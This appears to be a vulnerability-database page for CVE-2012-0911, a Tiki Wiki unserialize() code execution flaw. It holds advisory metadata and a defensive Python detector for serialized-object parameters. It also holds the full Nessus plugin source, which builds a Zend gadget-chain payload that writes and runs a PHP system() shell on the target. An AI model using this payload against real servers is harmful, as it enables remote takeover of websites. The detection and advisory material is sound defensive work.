CVE-2012-0911 - Deserialization of Untrusted Data vulnerability in Tiki Tikiwiki Cms/Groupware

CVSS 9.8 - CRITICAL
  Attack vector: NETWORK
  Attack complexity: LOW
  Privileges required: NONE
  Confidentiality impact: HIGH
  Integrity impact: HIGH
  Availability impact: HIGH

Tags: network, low complexity, tiki, CWE-502, critical, nessus, exploit available, metasploit

Summary

TikiWiki CMS/Groupware before 6.7 LTS and before 8.4 allows remote attackers to execute arbitrary PHP code via a crafted serialized object in the (1) cookieName to lib/banners/bannerlib.php; (2) printpages or (3) printstructures parameter to (a) tiki-print_multi_pages.php or (b) tiki-print_pages.php; or (4) sendpages, (5) sendstructures, or (6) sendarticles parameter to tiki-send_objects.php, which is not properly handled when processed by the unserialize function.
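The summary above lists the scripts and parameters through which request data reached unserialize(). The following is an added example (not Tiki, Nessus or Metasploit code) written from the defender's side: a minimal tokenizer for PHP's serialization format that walks a parameter value by its declared byte lengths and reports which class names an unserialize() call would instantiate. A WAF rule or log review can use it to flag object payloads on the affected endpoints while letting plain serialized arrays through (assumed here to be the legitimate shape of these parameters). The script paths and parameter names come from the summary; the sample requests are constructed, and stdClass stands in for any real gadget class.

```python
"""Flag requests to the Tiki scripts named in CVE-2012-0911 whose listed
parameters carry a PHP-serialized object. Added example, not project code."""
import re
from urllib.parse import parse_qsl

# Scripts and parameters taken from the CVE summary on this page.
AFFECTED = {
    "/lib/banners/bannerlib.php": {"cookieName"},
    "/tiki-print_multi_pages.php": {"printpages", "printstructures"},
    "/tiki-print_pages.php": {"printpages", "printstructures"},
    "/tiki-send_objects.php": {"sendpages", "sendstructures", "sendarticles"},
}

_STR = re.compile(rb's:(\d+):"')
_ARR = re.compile(rb'a:(\d+):\{')
_OBJ = re.compile(rb'[OC]:(\d+):"')
_OBJ_TAIL = re.compile(rb'":(\d+):\{')


def _parse(data: bytes, pos: int, classes: list) -> int:
    """Parse one serialized value at `pos`, appending the class name of every
    O: (object) or C: (custom-serialized) token. Returns the offset just past
    the value; raises ValueError on malformed input. Lengths are byte counts,
    as in PHP, so string bodies are skipped rather than scanned and an "O:"
    inside a string value is never mistaken for an object."""
    t = data[pos:pos + 1]
    if t == b"N":                                  # N;
        if data[pos + 1:pos + 2] != b";":
            raise ValueError("bad null")
        return pos + 2
    if t in (b"b", b"i", b"d"):                    # b:1; i:42; d:1.5;
        return data.index(b";", pos) + 1
    if t == b"s":                                  # s:<len>:"<bytes>";
        m = _STR.match(data, pos)
        if not m:
            raise ValueError("bad string header")
        end = m.end() + int(m.group(1))
        if data[end:end + 2] != b'";':
            raise ValueError("string length mismatch")
        return end + 2
    if t == b"a":                                  # a:<n>:{key;value;...}
        m = _ARR.match(data, pos)
        if not m:
            raise ValueError("bad array header")
        pos = m.end()
        for _ in range(int(m.group(1))):
            pos = _parse(data, pos, classes)       # key
            pos = _parse(data, pos, classes)       # value
        if data[pos:pos + 1] != b"}":
            raise ValueError("unterminated array")
        return pos + 1
    if t in (b"O", b"C"):                          # O:<len>:"Class":<n>:{...}
        m = _OBJ.match(data, pos)
        if not m:
            raise ValueError("bad object header")
        name_end = m.end() + int(m.group(1))
        classes.append(data[m.end():name_end].decode("latin-1"))
        tail = _OBJ_TAIL.match(data, name_end)
        if not tail:
            raise ValueError("bad object body header")
        pos = tail.end()
        if t == b"C":                              # opaque payload of <n> bytes
            pos += int(tail.group(1))
        else:
            for _ in range(int(tail.group(1))):
                pos = _parse(data, pos, classes)   # property name
                pos = _parse(data, pos, classes)   # property value
        if data[pos:pos + 1] != b"}":
            raise ValueError("unterminated object")
        return pos + 1
    raise ValueError("unknown type tag %r" % t)


def serialized_classes(raw: bytes) -> list:
    """Class names unserialize() would instantiate for `raw`; [] for plain data."""
    classes = []
    if _parse(raw, 0, classes) != len(raw):
        raise ValueError("trailing data after serialized value")
    return classes


def inspect_request(path: str, query_or_body: str) -> list:
    """Findings for one request: (parameter, classes) for each watched parameter
    that unserializes to an object, or (parameter, None) when the value is not
    valid serialized data at all (also worth a look, since it is not a page list)."""
    findings = []
    watched = AFFECTED.get(path)
    if not watched:
        return findings
    for name, value in parse_qsl(query_or_body, keep_blank_values=True,
                                 encoding="latin-1"):
        if name not in watched:
            continue
        raw = value.encode("latin-1")   # latin-1 round-trips %00 and high bytes
        try:
            classes = serialized_classes(raw)
        except ValueError:
            findings.append((name, None))
            continue
        if classes:
            findings.append((name, classes))
    return findings


# Constructed sample traffic (not captured from any real system).
BENIGN = "printpages=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22HomePage%22%3Bi%3A1%3Bs%3A7%3A%22SandBox%22%3B%7D"
OBJECT = "printpages=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A3%3A%22foo%22%3Bs%3A3%3A%22bar%22%3B%7D"
DECOY = "printpages=a%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22O%3A5%3A%22Fake%22%3B%22%3B%7D"
MALFORMED = "printpages=O%3A99%3A%22x"

if __name__ == "__main__":
    for sample in (BENIGN, OBJECT, DECOY, MALFORMED):
        print(inspect_request("/tiki-print_multi_pages.php", sample))
```

The DECOY sample shows why a tokenizer is used instead of a bare regex: its only "O:" sits inside a string body, so it produces no finding, whereas OBJECT is reported with the class it would instantiate. Detection of this kind is a stopgap; the application-side fix is to keep request data away from unserialize() altogether (a JSON list of page names, or, on PHP 7 and later, unserialize() with the allowed_classes option set to false).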

Vulnerable Configurations

Part         Description   Count
Application  Tiki          2

Common Weakness Enumeration (CWE)

CWE-502: Deserialization of Untrusted Data

D2sec

name: Tiki Wiki CMS Groupware 8.3 RCE
url: http://www.d2sec.com/exploits/tiki_wiki_cms_groupware_8.3_rce.html

Exploit-Db

  • description: Tiki Wiki. CVE-2012-0911. Webapps exploit for php platform
    file: exploits/php/webapps/19630.rb
    id: EDB-ID:19630
    last seen: 2016-02-02
    modified: 2012-07-09
    platform: php
    published: 2012-07-09
    reporter: metasploit
    source: https://www.exploit-db.com/download/19630/
    title: Tiki Wiki <= 8.3 unserialize PHP Code Execution
    type: webapps
  • description: Tiki Wiki CMS Groupware <= 8.3 - "unserialize()" PHP Code Execution. CVE-2012-0911. Webapps exploit for php platform
    file: exploits/php/webapps/19573.php
    id: EDB-ID:19573
    last seen: 2016-02-02
    modified: 2012-07-04
    platform: php
    published: 2012-07-04
    reporter: EgiX
    source: https://www.exploit-db.com/download/19573/
    title: Tiki Wiki CMS Groupware <= 8.3 - "unserialize" PHP Code Execution
    type: webapps

Metasploit

description: This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. In order to run successfully, three conditions must be satisfied: (1) the display_errors php setting must be On to disclose the filesystem path of Tiki Wiki, (2) the Tiki Wiki Multiprint feature must be enabled to exploit the unserialize(), and (3) a php version older than 5.3.4 must be used to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
id: MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_UNSERIALIZE_EXEC
last seen: 2020-03-24
modified: 2019-08-02
published: 2012-07-05
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
title: Tiki Wiki unserialize() PHP Code Execution

Nessus

NASL family: CGI abuses
NASL id: TIKIWIKI_UNSERIALIZE_CODE_EXECUTION.NASL
description: The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The 'unserialize()' function is not properly sanitized before being used in the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php', 'tiki-send_objects.php' and 'tiki-print_pages.php' scripts. Successful exploitation of the vulnerability requires that the 'multiprint' feature is enabled, the PHP setting 'display_errors' must be set to 'On', and a PHP version older than 5.3.4 must be in use to allow poison NULL bytes in filesystem-related functions.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 61733
published: 2012-08-30
reporter: This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/61733
title: TikiWiki unserialize() Function Arbitrary Code Execution
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(61733);
  script_version("1.14");
  script_cvs_date("Date: 2019/12/04");

  script_cve_id("CVE-2012-0911");
  script_bugtraq_id(54298);
  script_xref(name:"EDB-ID", value:"19573");

  script_name(english:"TikiWiki unserialize() Function Arbitrary Code Execution");
  script_summary(english:"Attempts to execute arbitrary PHP code");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary code
execution.");
  script_set_attribute(attribute:"description", value:
"The version of the TikiWiki installed on the remote host contains a
flaw that could allow a remote attacker to execute arbitrary code.  The
'unserialize()' function is not properly sanitized before being used in
the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php',
'tiki-send_objects.php' and 'tiki-print_pages.php' scripts. 

Successful exploitation of the vulnerability requires that the
'multiprint' feature is enabled, the PHP setting 'display_errors' must
be set to 'On', and a PHP version older than 5.3.4 must be in use to
allow poison NULL bytes in filesystem-related functions.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2012/Jul/19");
  script_set_attribute(attribute:"see_also", value:"https://tiki.org/article191-Tiki-Releases-8-4");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 8.4 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Tiki Wiki CMS Groupware 8.3 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Tiki Wiki unserialize() PHP Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/04");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/30");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("tikiwiki_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("www/tikiwiki", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, php:TRUE);

install = get_install_from_kb(
  appname      : "tikiwiki",
  port         : port,
  exit_on_fail : TRUE
);
dir = install["dir"];
install_url = build_url(qs:dir+'/', port:port);

# Get full path for use in our exploit POST request
url = dir + '/tiki-rss_error.php';
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

get_path = eregmatch(pattern:"[> ](([a-zA-Z]:\\|\/).*)tiki-rss_error\.php", string:res[2], icase:TRUE);
if (isnull(get_path)) exit(0, "The full path for the TikiWiki install at "+install_url+" could not be determined.");
install_path = get_path[1];


# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';

  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";

token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".php";

foreach cmd (cmds)
{
  # Get path to the file uploaded for use in our reporting section
  if (cmd == 'id') upload_path = "system('pwd')";
  else upload_path = "system('dir "+ token +"')";

  # Form  our PHP file to upload
  php_shell = "<?php+echo('<pre>');+system('"+ cmd +"');+echo(' - "+token+" ');+"+upload_path+";?>";

  shell_length = strlen(php_shell);
  path = install_path + token + "%00";
  path_length = strlen(path) - 2;

  printpages = 'O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:' +
  '{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:' +
  '{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:' +
  '{s:11:\"%00*%00_dirPath\";s:' + path_length +':"'+path+'";}' +
  's:10:\"%00*%00_fields\";a:1:' +
  '{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:' +
  '{s:4:\"name\";s:'+shell_length+':"'+php_shell+'";}}' +
  's:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}';

  printpages = urlencode(
    str        : printpages,
    unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~'-+$",
    case_type  : HEX_UPPERCASE
  );

  # Send POST request to upload the PHP file
  res2 = http_send_recv3(
    port         : port,
    method       : "POST",
    item         : dir + '/tiki-print_multi_pages.php',
    data         : 'printpages=' + printpages,
    add_headers  : make_array("Content-Type","application/x-www-form-urlencoded"),
    exit_on_fail : TRUE
  );

  if ('Required features: <b>feature_wiki_multiprint</b>' >< res2[2])
    exit(0, "The Multiprint feature appears to be disabled for the TikiWiki install at "+install_url+".");

  exp_request = http_last_sent_request();

  # Try accessing the file we uploaded
  url3 = dir + "/" + token;
  res3 = http_send_recv3(method:"GET", item:url3, port:port, exit_on_fail:TRUE);
  if (egrep(pattern:cmd_pats[cmd], string:res3[2]))
  {
    # Remove NULL byte and format the output
    if (cmd == 'id')
    {
      out_full = strstr(res3[2], "uid");
      pos = stridx(out_full, " - " + token);
      output = substr(out_full, 0, pos);

      form_up_path = strstr(res3[2], "php");
      form_up_path2 = stridx(form_up_path, '\n');
      form_up_path3 = substr(form_up_path, 0, form_up_path2) - "php ";
      get_up_path = chomp(form_up_path3) + "/" + token;
    }
    else
    {
      out_full = strstr(res3[2], "Windows IP Configuration");
      pos = stridx(out_full, " - " + token);
      output = substr(out_full, 0, pos);

      form_up_path = strstr(res3[2],"Directory of");
      form_up_path2 = stridx(form_up_path, '\n');
      form_up_path3 = substr(form_up_path, 0, form_up_path2) - "Directory of ";
      get_up_path = chomp(form_up_path3) + "\" + token;
    }
    if (report_verbosity > 0)
    {
      snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
      report =
        '\nNessus was able to verify the issue exists using the following request :' +
        '\n' +
        '\n' + build_url(qs:url3, port:port) +
        '\n' +
        '\nNote: This file has not been removed by Nessus and will need to be' +
        '\nmanually deleted (' + get_up_path + ').' +
        '\n';
      if (report_verbosity > 1)
      {
        report +=
          '\nThis file was uploaded using the following request :' +
          '\n' +
          '\n' + snip +
          '\n' + exp_request +
          '\n' + snip +
          '\n' +
          '\n' + 'The file uploaded by Nessus executed the command : '+ cmd +
          '\nwhich produced the following output :' +
          '\n' +
          '\n' + snip +
          '\n' + data_protection::sanitize_uid(output:chomp(output)) +
          '\n' + snip +
          '\n';
      }
       security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "TikiWiki", install_url);

Seebug

  • bulletinFamily: exploit
    description: Bugtraq ID: 54298 CVE ID: CVE-2012-0911. Tiki Wiki CMS Groupware is a content management and collaboration system. Multiple scripts in Tiki Wiki CMS Groupware call "unserialize()" on user-controllable input, which allows arbitrary PHP code to be executed by passing ad-hoc serialized Zend Framework objects. Affected: Tiki Wiki CMS Groupware <= 8.3. Vendor patch: Tiki Wiki CMS Groupware 8.4 fixes this vulnerability; users are advised to download and use it: http://info.tiki.org/article191-Tiki-Releases-8-4
    id: SSV:60261
    last seen: 2017-11-19
    modified: 2012-07-06
    published: 2012-07-06
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-60261
    title: Tiki Wiki CMS Groupware 'unserialize()' PHP Code Execution Vulnerability
  • bulletinFamily: exploit
    description: ## Tiki Wiki CMS Groupware 'unserialize()' Multiple Remote PHP Code Execution Vulnerabilities ## Vulnerability type: design flaw ## Cause: Tiki Wiki CMS Groupware versions before 6.9 and before 9.3 contain a security vulnerability: certain scripts apply "unserialize()" to user-controlled input, and an attacker can exploit this to inject and execute arbitrary PHP code in the affected application. ## Remediation: update to the latest version http://info.tiki.org/article210-Tiki-10-0-is-here
    id: SSV:73494
    last seen: 2017-11-19
    modified: 2014-07-01
    published: 2014-07-01
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-73494
    title: Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution